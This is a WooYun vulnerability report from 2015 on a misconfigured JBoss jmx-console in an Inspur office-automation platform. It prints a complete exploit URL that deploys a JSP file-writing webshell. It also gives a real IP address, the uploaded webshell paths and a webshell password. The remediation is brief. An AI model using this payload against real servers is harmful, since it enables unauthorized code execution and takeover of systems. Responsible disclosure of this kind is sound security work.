当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118380

漏洞标题:浪潮某办公平台配置不当导致getshell

相关厂商:浪潮

漏洞作者: 茜茜公主

提交时间:2015-06-05 11:48

修复时间:2015-07-23 15:16

公开时间:2015-07-23 15:16

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

配置不当导致getshell

详细说明:

浪潮协同办公平台-oa
地址:http://123.232.100.133:8080/WEBOA/control/main

QQ截图20150605104556.jpg


系统使用了jboss
已成马场

QQ截图20150605104708.jpg


可通过http://123.232.100.133:8080/jmx-console/部署war拿shell

QQ截图20150605105303.jpg


http://123.232.100.133:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=wooyun.war&argType=java.lang.String&&arg1=ixm&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

漏洞证明:

我上传的小马http://123.232.100.133:8080/wooyun/ixm.jsp
一句话http://123.232.100.133:8080/wooyun/wooyun.jsp
密码:woo0yun

QQ截图20150605105118.jpg


QQ截图20150605105348.jpg


QQ截图20150605105436.jpg

修复方案:

正确配置jboss,该删的都删了吧

版权声明:转载请注明来源 茜茜公主@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-08 15:14

厂商回复:

感谢反馈,工程师修复中..

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-28 19:47 | 日出东方 ( 普通白帽子 | Rank:161 漏洞数:51 )

    大姐能给讲下流程么